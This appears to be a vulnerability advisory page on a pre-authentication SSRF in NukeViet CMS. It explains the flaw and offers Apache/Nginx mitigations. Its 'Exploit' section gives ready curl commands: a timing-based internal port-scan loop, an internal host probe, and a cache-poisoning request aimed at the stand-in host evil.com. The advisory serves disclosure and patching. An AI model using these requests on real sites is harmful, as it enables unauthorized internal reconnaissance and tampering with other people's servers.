NukeViet CMS, Pre-authentication Server-Side Request Forgery (SSRF), CVE-2026-55372 (High) -DC-Jul2026-951

Listen to this Post

An unauthenticated attacker can coerce the server into issuing HTTP requests to an attacker-chosen host by spoofing the `X-Forwarded-Host` and `X-Forwarded-Proto` request headers. The forwarded host is used, without validation, to build the URL that `server_info_update()` fetches with cURL, resulting in a Server-Side Request Forgery (SSRF) that requires no authentication.
The vulnerability exists because the `NukeViet\Core\Server` class derives `original_host` and `original_protocol` from the `X-Forwarded-Host` and `X-Forwarded-Proto` headers and exposes them via `getOriginalHost()` and getOriginalProtocol(). These values are attacker-controlled and are not validated against the site’s configured domains (my_domains).
In server_info_update(), the tainted host and scheme are concatenated directly into a cURL URL:

$proto = $nv_Server->getOriginalProtocol(); // from X-Forwarded-Proto
$host = $nv_Server->getOriginalHost(); // from X-Forwarded-Host
$ch = curl_init($proto . '://' . $host . NV_BASE_SITEURL . 'index.php?response_headers_detect=1');
curl_exec($ch);

Two factors make this reliably reachable:

  1. The `__serverInfoUpdate` handler runs very early in includes/ini.php, before authentication, so the sink is reachable pre-auth.
  2. The host sanitizer `standardizeHost()` stripped a trailing port only with the regex (\:[0-9]+)$, which is bypassed by appending a slash (e.g., 127.0.0.1:8081/): the string no longer ends in :digits, so the port survives and an arbitrary `host:port` reaches the cURL call.
    The SSRF is blind, HEAD-only, and uses a fixed request path (…/index.php?response_headers_detect=1). The fetched response is stored server-side in the `config_ini` cache and is not reflected to the attacker. Because the path is fixed and not attacker-controlled, cloud metadata endpoints (e.g., 169.254.169.254/latest/meta-data/...) cannot be reached, and `gopher://` / `dict://` request smuggling cannot inject arbitrary payloads. What an attacker can do: unauthenticated internal host/port discovery (connection success/timing, with the port reachable through the regex bypass), and poisoning of the cached `server_headers` (the SSRF target’s response headers are stored and applied to the site).

DailyCVE Form

Platform: NukeViet CMS
Version: < 4.6.00
Vulnerability: Pre-auth SSRF
Severity: High (7.2 CVSS)
Date: 2026-07-13

Prediction: Patch expected 4.6.00

What Undercode Say

Analytics:

Check NukeViet version
grep "NV_VERSION" includes/constants.php
Check if my_domains is configured
grep "my_domains" includes/config.php
Test for SSRF vulnerability
curl -X POST http://<victim>/index.php \
-H "X-Forwarded-Proto: http" \
-H "X-Forwarded-Host: <attacker-controlled-host>:<port>/" \
-d "__serverInfoUpdate=1"

Exploit:

1. Port scan internal hosts via timing
for port in 80 443 8080 8443 3306 5432 6379; do
time curl -s -o /dev/null -X POST http://<victim>/index.php \
-H "X-Forwarded-Proto: http" \
-H "X-Forwarded-Host: 127.0.0.1:${port}/" \
-d "__serverInfoUpdate=1"
done
2. Test for internal service reachability
curl -X POST http://<victim>/index.php \
-H "X-Forwarded-Proto: http" \
-H "X-Forwarded-Host: 192.168.1.1:8080/" \
-d "__serverInfoUpdate=1"
3. Poison server_headers cache
curl -X POST http://<victim>/index.php \
-H "X-Forwarded-Proto: https" \
-H "X-Forwarded-Host: evil.com/" \
-d "__serverInfoUpdate=1"

Protection:

Apache: Strip X-Forwarded- headers
<IfModule mod_headers.c>
RequestHeader unset X-Forwarded-Host
RequestHeader unset X-Forwarded-Proto
RequestHeader unset X-Forwarded-Port
</IfModule>
Nginx: Override X-Forwarded- headers
proxy_set_header X-Forwarded-Host $host;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Forwarded-Port $server_port;
Validate my_domains in config.php
$global_config['my_domains'] = ['example.com', 'www.example.com'];

Impact:

  • Unauthenticated internal host/port discovery
  • Poisoning of cached `server_headers`
    – No data exfiltration, cloud credential theft, or internal RCE

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top